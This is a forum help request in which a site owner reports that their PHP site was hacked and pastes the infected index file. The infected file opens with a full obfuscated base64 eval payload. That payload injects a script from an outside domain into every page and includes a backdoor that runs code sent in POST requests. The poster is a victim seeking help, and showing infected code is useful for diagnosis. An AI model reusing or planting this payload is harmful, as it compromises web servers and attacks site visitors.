Somebody hacked into my site and changed coding >>> URGENT HELP NEEDED <<<


Posted on 16th Feb 2014 07:03 pm by admin

I am not that much into programming , but somebody is hacking to my site and injecting some kind of iframes ... it happened to another site , but that wasn't that important for me, but now it has happened to one of my major site not sure what is going on. Need some immediate help

I see this code



QuoteFatal error: Cannot redeclare flq() (previously declared in /home/articles/public_html/lib/functions.compat.php(1) : eval()'d code:1) in /home/articles/public_html/lib/functions.date.php(1) : eval()'d code on line 1

This is the infected index home page file now

Quote<?php eval(base64_decode('aWYoIWlzc2V0KCRmbHExKSl7ZnVuY3Rpb24gZmxxKCRzKXtpZ ihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkZuWVdjME5DNWpiMjB2ZG1JdllYSmtiaTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIGZscTIoJGEsJGIsJGMsJGQpe2dsb2JhbCAkZmxxMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkZmxxMSkpY2FsbF91c2VyX2Z1bmMoJGZscTEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSkgYXMgJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZmxxJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2ZscScpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRmbHFsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdmbHEyJykpIT0nZmxxMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?><?php


include("init.php");
$GLOBALS["AL_CLASS_INDEX"] = &GetClass('index');
$GLOBALS["AL_CLASS_INDEX"]->HandlePage();


?>

This was the original index



Quote<?php


include("init.php");
$GLOBALS["AL_CLASS_INDEX"] = &GetClass('index');
$GLOBALS["AL_CLASS_INDEX"]->HandlePage();


?>

when I try to replace it agin gives some error it happened a day before , when I replace the index from backup it worked , but today its not working, need some help immediatly .. thanks

No comments posted yet

Your Answer:

Login to answer
151 Like 12 Dislike
Previous forums Next forums
Other forums

Consuming third party Payment Gateway API from Procedure.
Hi All,

First of all i would like to thank all the people of the oracle forum for providi

need help about
i store the value of my select statement result to an array and stored it to a variable named $fname

How do i use vars in an array
Hiya peeps!

How do I use a var in an array. You will see $id but it isnt working.


Problems with strings containing
Hey all,

I have encountered something strange in a script. I am trying to write an XML heade

PHP referral database. I would like this form to email the referrer.
Okay, Hello I've been trolling for years. This the first time I've ever asked for php help. Normally

Xacute search within SQL results
I have a query that is pulling data, and I want to return a specific value from the results of that

Please help understand this code
I noticed the index page on my site was modified this morning and found this code inserted at the bo

How a counter of users ? such as ---> (231 Viewing)
I want to count how many users are actually viewing the page, How is that possible?
Thank you guy

ORA-01017: invalid username/password; logon denied
Dear All,

I am facing problem in taken backup from db13 it comes up with the following l

Question handling xml data
Hello,

I have sucessfull followed this tutorial
http://www.phpfreaks.com/tutorial/handlin

Sign up to write
Sign up now if you have flare of writing..
Login   |   Register
Follow Us
Indyaspeak @ Facebook Indyaspeak @ Twitter Indyaspeak @ Pinterest RSS



 
© indyaspeak.com. All Rights Reserved.
Play Free Quiz and Win Cash